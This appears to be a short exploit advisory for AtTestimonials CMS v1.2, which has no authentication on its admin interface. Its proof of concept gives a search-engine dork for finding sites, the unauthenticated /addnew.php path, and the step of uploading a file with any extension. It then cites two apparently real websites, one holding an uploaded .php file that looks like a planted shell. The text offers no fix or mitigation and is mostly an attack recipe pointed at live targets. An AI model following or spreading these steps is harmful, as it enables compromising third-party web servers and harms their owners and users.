AtTestimonials CMS 1.2 Missing Authentication

====================================================================================================================================| # Title     : AtTestimonials CMS v1.2 Missing Authentication Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip                                       || # Dork      : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to be missing authentication on the administrative interface[+] Use payload : /addnew.php[+] Add New Testimonials[+] http://wccpavingcouk/testimonials/addnew.php[+] Attach any file extension[+]  http://dfwcarfixcom/testimonials/upload/084145ahmad.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================